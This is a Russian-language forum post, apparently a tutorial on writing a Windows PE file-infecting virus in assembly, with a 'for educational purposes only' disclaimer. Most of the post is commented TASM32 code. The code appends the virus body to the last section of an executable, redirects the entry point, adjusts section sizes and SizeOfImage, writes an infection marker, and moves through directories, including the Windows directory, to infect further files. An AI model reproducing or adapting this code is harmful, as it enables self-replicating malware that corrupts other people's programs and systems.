Почти каждый, кто изучает язык ассемблера, рано или поздно пишет вирус, некоторые люди пишут вирус, когда заканчивают изучать какой-нибудь язык программирования... Прежде чем читать то, что я буду писать ниже и понимать хоть что-нибудь, вы должны: а) знать основные команды ассемблера б) уметь пользоватся АПИ-функциями в) взять где-нибудь (можно и у меня) TASM32 (можно и другой, но каждый компилятор имеет свои особенности). г) отладчик (если собираетесь собственноручно создать зверька, то без отладки довольно трудно найти ошибки) д) прогу, которая прикреплена (на неё вопит касперский, но это не вирус!!!! ) е) иметь здоровую голову (если вы хотите испортить все компы на Земле, то ваше место в больнице, а не здесь) ё) ПОМНИТЬ, ЧТО ЭТОТ МАТЕРИАЛ ПРЕДСТАВЛЕН ТОЛЬКО В ЦЕЛЯХ ОБУЧЕНИЯ, И ЗА ПОСЛЕДСТВИЯ Я НИКАКОЙ ОТВЕТСТВЕННОСТИ НЕ НЕСУ Вроде всё.
Теперь план обучения: 1) формат заголовка файла РЕ 2) разбор основных полей заголовка РЕ 3) методика заражения 4) дельта-смещение. 5) поиск АПИ 6) разбор используемых АПИ 7) пишем код 8) Reserved
ls_found: ; сюда попадём после того, как найдена последняя (физически и виртуально) секция. ; регистры изменятся ; esi=edi=VA of last section ; edx - виртуальное смещение of last section ; ebx - физическое смещение of last section ; флаги всех секций установлены в 0а0000020
pop esi mov eax, dword ptr [esi+28h] ; берём rva точки входа add eax, dword ptr [esi+34h] ; добавляем базу, получаем va mov dword ptr [ebp+EIPs],eax ; этот адрес кидаем в переменную, которая когда-то станет значением еах. pop eax ; вспомним начало файла push esi push edi ; запомним адрес заголовка и адрес начала структуры описания последней секции
mov edi, [edi+10h] ; в edi - размер секции
lea edi, [ebx+edi] ; в edi - размер секции + физическое смещение последней секции = смещение ; последнего байта секции (относительно начала) add edi, eax ;прибавляем адрес начала получаем VA mov ecx, vir_size ;в есх - длину вируса lea esi, [ebp+offset start] ; esi указывает на начало rep movsb ; копирует один байт из памяти по адресу ds:esi в память по адресу es:edi есх раз ; то есть после этого вирус перекачует в память начиная с конца последней секции ; файла, который заражаем, куда указывает edi. вот и поселились, осталось обосноваться.
pop edi pop esi ; вспомним адрес заголовка и адрес начала структуры описания последней секции
mov eax, dword ptr [edi+0ch] ; в еах - rva последней секции add eax, dword ptr [edi+10h] ; + размер секции (до заражения) - получаем rva начала нашего кода mov dword ptr [esi+28h], eax ; меняем entry point на тот, который указывает на наш код.
mov eax, vir_size call aligning ; в еах выровненная длина виря
add dword ptr [edi+10h], eax ; её прибавляем к физическому размеру секции add dword ptr [edi+8], eax ; также к виртуальному
mov eax, dword ptr [edi+0ch] ; в еах - rva последней секции add eax, dword ptr [edi+8] ; добавляем к ней виртуальный размер, получая значение, которое можно записать ...
mov dword ptr [esi+50h], eax ; ... в поле Size Of Image заголовка mov dword ptr [esi+44h], 'CPM ' ; устанавливаем метку заражения
xor ebx,ebx ; закончили работу с файлом нужно закрыть и искать следующий, а для этого нужно ebx = 0
UVF: push [ebp+pFM] call [ebp+_UnmapViewOfFile] ; убираем файл из памяти close_FM: push [ebp+hFM] call [ebp+_CloseHandle] ; закрываем мэппинг test ebx,ebx jnz step1 ; тут прикол с ebx, о нём выше
; ======процедурка, которая делает фокус с ebx, что приводит к закрытию файла zeroid: xor ebx,ebx jmp UVF ; ======
; ==========процедурка поиска последней (физически и виртуально) секции ; eax - pe header va last_sec_find: movzx edi, word ptr [eax+14h] ; в edi размер заголовка без учёта IMAGE_FILE_HEADER (18h) lea eax,[eax+edi+18h] ; прибавляем 18h и адрес начала файла, получаем смещение начала таблицы секций
mov ebx, [eax+14h] ; в ebx - физическое смещение первой mov edx, [eax+0ch] ; в edx - виртуальное смещение первой
scoffs: mov [eax+24h], 0A0000020h ; фиксим флаги cmp ebx, [eax+14h] ; сравниваем физическое смещение текущей секции с физическим следующей ja shvrva ; если текущее больше идём сравнивать виртуальные mov ebx, [eax+14h] ; если нет - запоминаем его mov esi, eax ; в esi адрес структуры с большим физическим смещением
shvrva: cmp edx, [eax+0ch] ; сравниваем вмртуальные ja nextobj ; если текущее больше, переходим к следующей структуре mov edx, [eax+0ch] mov edi, eax ; если нет, действия, аналогичные тем, которые были с физическими
nextobj: add eax, 28h ; структура имеет размер 28h, то есть, чтоб перейти к следующей, ; нам надо прибавить 28h к текущей loop scoffs ; так будем перебирать все секции cmp esi, edi ; посмотрим принадлежат ли самое большое физическое и виртуальное смещение одной секции je ls_found ; если да, то прыгаем, откуда пришли pop eax pop eax ; если нет - восстановим стек jmp zeroid ; и выйдим ; ====================
; ==============процедура выравнивания aligning: ; eax - numb to align mov ecx, [ebp+file_align] dec ecx add eax, ecx not ecx and eax, ecx ret ; eax-aligned ; ===============
; ==================работает в первом поколении first_gen: xor ebx, ebx
; =============переход на следующую директорию nextdir: cmp byte ptr [ebp+numbofdirs], 0 ; если нет больше директорий... jz Exit ; ...на выход call killfind ; а так - "убиваем" хендл поиска lea edi, [ebp+offset szWindowsDirectory] ; идём на директорию винды push edi call [ebp+_SetCurrentDirectoryA] ; делаем её текущей для нашего процесса dec byte ptr [ebp+numbofdirs] ; отнимаем 1 от кол-ва директорий jmp FindFirsttttt ; ищем первый файл в текущей директории ; ====================
FAttrNorm equ 80h ; новые аттрибуты файла MAX_PATH equ 100h ; максимальное значение длины пути, которое мы допускаем Some_pathes equ 50h ; длина пути к виндозной директории vir_size equ (vir_end-start) ; длина вируса PAGE_READWRITE equ 00000004h SECTION_MAP_WRITE equ 2h SECTION_MAP_READ equ 4h SRW equ SECTION_MAP_WRITE or SECTION_MAP_READ
Правила форума
Пишем вирус..., Наконец написал.
